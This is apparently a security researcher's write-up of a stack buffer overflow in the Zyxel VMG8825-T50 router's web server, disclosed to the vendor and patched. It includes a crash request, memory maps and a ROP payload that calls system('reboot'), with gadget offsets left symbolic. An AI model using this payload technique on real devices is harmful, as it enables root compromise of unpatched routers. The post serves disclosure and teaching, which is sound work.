Exploiting a stack-based buffer overflow in practice

In my previous post, I detailed a fun method of obtaining root access on the Zyxel VMG8825-T50 router, which required physical access to the device and authenticated access to the web interface.

In this post, I will detail the exploitation of a vulnerability that could potentially result in unauthenticated RCE as root, given LAN access only. This vulnerability was also found on the VMG8825-T50 router, but it turns out to be present in multiple other Zyxel devices.

Classic buffer overflow

When an HTTP request comes in, the router’s zhttpd webserver compares the incoming request URL against a hardcoded list of endpoints, each of which has a corresponding request handler function. When there is no match, a fallback function (let’s call it _root_handler) takes care of the request.

The main purpose of this function seems to be to handle requests to static assets on the device’s filesystem, such as CSS and Javascript files. For this purpose, it converts the requested URL to an absolute path on the filesystem before returning the contents of that file (if it exists).

To store the converted filepath, the function defines a local 256-byte buffer to store the URL, converted to a path on the device’s filesystem.

The _root_handler function relies on another functon (let’s call it _get_filepath_from_url), which checks for the presence of several specific paths. If none of them match, it copies the URL from the HTTP request (until a question mark, if it contains any) into the 256-byte buffer defined in _root_handler using a sscanf invocation:

If we therefore pass a URL longer than 256 bytes, the sscanf function will continue copying bytes past the boundary of the buffer, leading to a textbook linear stack-based buffer overflow, which can be triggered through an HTTP request from the device’s LAN.

By requesting a specially crafted URL, we can overflow the buffer and overwrite the saved return address stored on the stack. Upon return of the function’s caller, this will cause the processor to jump to the address specified by us:

TARGET_URL = "http://192.168.1.1"
path = "X" * 251 + "AAAA"
requests.get(f"{TARGET_URL}/{path}")

Resulting in:

GDB output shows an attempt to return to 0x41414141

Limitations

Due to the logic performed before and during the sscanf operation, the payload that can be sent is somewhat limited. Specifically, several byte values cannot be used, as they break up the string during or before the sscanf operation. These include \0, &, ? and space. There is no URL-decoding step: this is the raw URL from the (potentially malformed) HTTP request, even if it includes characters that would normally be encoded.

This means that there’s no way around the bad bytes mentioned above, and it also means that we’re even more limited if we want the request to be a valid HTTP GET request, for example by constructing a malicious link or for performing a CSRF-like attack.

For the rest of this article I will therefore focus on the case of a local attacker on the device’s LAN, who is able to send abritrary TCP requests – and therefore potentially malformed HTTP requests – to the device.

Where to return to?

It turns out that the zhttpd binary is always mapped at a memory address starting with 0x00. Because a null-byte ends the sscanf operation, it is not possible to directly jump to a potential ROP gadget in the binary itself – especially considering that this is a big-endian target (MIPS).

The same holds for heap space mapped by the application. Additionally, the thread-specific stack space is marked non-executable, preventing us from writing shellcode to the stack and executing that.

The zhttpd binary does however make use of multiple shared libraries, which are mapped at high addresses that do not start with a null byte (usually between 0x76000000 and 0x78000000). The same holds for the shared stack space.

00400000-00456000 r-xp 00000000 1f:06 1761       /bin/zhttpd
00466000-00468000 rw-p 00056000 1f:06 1761       /bin/zhttpd
009d0000-009da000 rwxp 00000000 00:00 0          [heap]
75ca0000-75ca1000 ---p 00000000 00:00 0 
75ca1000-75ea0000 rw-p 00000000 00:00 0          [stack:21903]
75ea0000-75ea1000 ---p 00000000 00:00 0 
(...)
778a0000-778ad000 rw-s 00000000 00:01 98307      /SYSV000e051b (deleted)
778ae000-778ce000 rw-s 00000000 00:01 32769      /SYSVffffffff (deleted)
778ce000-778e0000 r-xp 00000000 1f:06 701        /usr/lib/libz.so.1.2.7
(...)
77961000-779db000 r-xp 00000000 1f:06 1464       /lib/libuClibc-0.9.33.2.so
779db000-779ea000 ---p 00000000 00:00 0 
779ea000-779eb000 r--p 00079000 1f:06 1464       /lib/libuClibc-0.9.33.2.so
779eb000-779ec000 rw-p 0007a000 1f:06 1464       /lib/libuClibc-0.9.33.2.so
(...)
7fba7000-7fbc8000 rwxp 00000000 00:00 0          [stack]
7fff7000-7fff8000 r-xp 00000000 00:00 0          [vdso]

In the case of this zhttpd process, it turns out that library locations are randomly chosen out of 4096 possibilities. This means that we will either have to leak an address somehow, or guess a library base address by brute-force. I’ll come back to this later, but for now let’s assume that the libc base address is known. You could say this is cheating, but for me this was more a fun exercise than a practical attack.

Sketching out the attack

Given a leaked or brute-forced libc base address, we can try to build a ROP chain out of gadgets in libuClibc-0.9.33.2.so. This is an arbitrary choice, and we might as well use one of the other loaded libraries.

As a proof-of-concept, we can try to call libc’s system function with the string reboot as an argument. Fundamentally, we’ll build a return-to-libc attack prepended with a short ROP chain to set up the registers. We pick the reboot shell command because it clearly allows us to see when the exploit succeeds: when the network goes down because the router is rebooting.

An alternative approach would have been to use ROP to write shellcode to the executable stack and jump there. However, this would have required dealing with cache coherency as well.

When building a ROP chain, I like to approach it from two directions:

What registers and areas of memory do we currently have control over?
What are the register and memory values we need to obtain in the final state, i.e. in order to call system("reboot")?

The process of picking ROP gadgets then becomes a quest of finding a path between (1) and (2). With some searching and trial and error, each added gadget should shorten the length of the remaining path. Sometimes, a counter-intuitive step needs to be taken in the “wrong” direction in order to find a complete path. There are tools and formal techniques for doing this, but in this post we’ll take a manual approach.

Finding the right gadgets

With root access on the device (I used an authenticated command injection vulnerability that has since been patched), we can upload a MIPS gdbserver binary with which we can debug the zhttpd binary while sending requests. With GEF, we can get a nice overview of all of the register values at the time of the crash:

Register values at the time of the crash

The screenshot above is actually from a different payload than the one used to construct the attack. It turns out that we can also get full control over $pc by requesting an URL of exactly 523 bytes (with the $pc value at the end), instead of 255. I didn’t investigate why this happens, but the result is that we have some level of control over a slightly different set of registers. Namely:

$a1: Pointer to a location in our payload
$a2: Pointer to a location in our payload
$s8: Literal value taken from a location in our payload 
$sp: Pointer to a location in our payload
$k0: Literal value taken from a location in our payload

Looking at our goal (executing system("reboot")), we need to set the argument to "reboot", and find a way to call system.

The former is done by making sure that $a0 points to a location within our payload. I used the following gadget:

This sets $a0 to a location within our payload on the stack (where we can make sure to write reboot), before continuing execution from an address which is also stored in our payload.

The latter challenge is calling system. If we look at an arbitrary system(...) invocation in zhttpd, we see that it happens indirectly by storing the location of system in $t9 before calling it using jalr t9.

Functions on this architecture are called indirectly through $t9.

Apparently this is such a strong convention that libc functions use this value of $t9 internally to calculate a new value for $gp. This means that we cannot call system with a jr ra gadget, as system itself relies on $t9 to be its own absolute address.

After a some searching, I found a jalr t9 gadget which takes its value from a register we’re likely to be able to control ($s5), as opposed to an absolute value:

Gadget to call a controllable address using $t9 (gadget3).

Now the only thing that remains is setting $s5 to a value we control, which is easily done with another gadget:

Luckily, the payload offsets used by each gadget are distinct. This results in the following payload:

payload = 
	b"A" * 15 +
	system +     # final jump location (libc_base + off_system)
	b"A" * 4 + 
	gadget2 +    # gadget2 location (libc_base + off_gadget2)
	b"A" * 24 + 
	cmd_20 +     # argument for system()
	gadget3 +    # gadget3 location (libc_base + off_gadget3)
	b"A" * 444 + 
	gadget1      # gadget1 location (libc_base + off_gadget1)

assert(len(payload) == 523)

request = b"GET /" + payload + b" HTTP/1.1\nHost: 192.168.0.1\n\n"

The only tough constraint with this setup is that we have only 20 bytes of space for the reboot command (or any other command that we want to pass to system). Since the payload cannot contain any null-bytes, we can terminate the command using a shell comment:

cmd_20 = b"reboot\t#aaaaaaaaaaaa"

After sending this request, the router immediately reboots :)

Practical exploitation

In order to turn this into a practical attack (e.g. a reverse shell), it is likely best to construct a slightly different ROP chain which allows for commands longer than 20 bytes.

And, as mentioned before, there’s of course also the prerequisite of having to leak or brute-force the libc base address. I did experient a bit with brute-forcing, but I couldn’t get a reliable set-up going as zhttpd would either crash too hard, where its watchdog script would not even reboot it, or I would only crash the request-handler threads, which would result in zhttp becoming slower and slower until it would no longer respond at all (after 20-50 attempts). If, however, one could reliably test one base address per second, then a brute-force attack would take ~30 minutes on average.

If while reading this article you thought “why not do X?”, please send me an email! I would love to hear about different approaches that I might have missed.

Responsible disclosure

The vulnerability described in this post was disclosed to the Zyxel security team (together with another one with lower impact). A public disclosure timeline of two months was mutually agreed upon.

The vulnerability was found in firmware version V5.50(ABPY.1)b14 of the VMG8825-T50. After investigation by Zyxel, it turns out to be present in multiple other Zyxel devices (as detailed in the Zyxel security advisory). For most of these devices, it has been patched in a December 2020 update.

Exploiting a stack-based buffer overflow in practice

Classic buffer overflow

The _root_handler function

Vulnerable sscanf invocation

GDB output shows an attempt to return to 0x41414141

Limitations

Where to return to?

Sketching out the attack

Finding the right gadgets

Register values at the time of the crash

Gadget to set $a0 (gadget2).

Functions on this architecture are called indirectly through $t9.

Gadget to call a controllable address using $t9 (gadget3).

Gadget to set $s5 and others (gadget1).

Practical exploitation

Responsible disclosure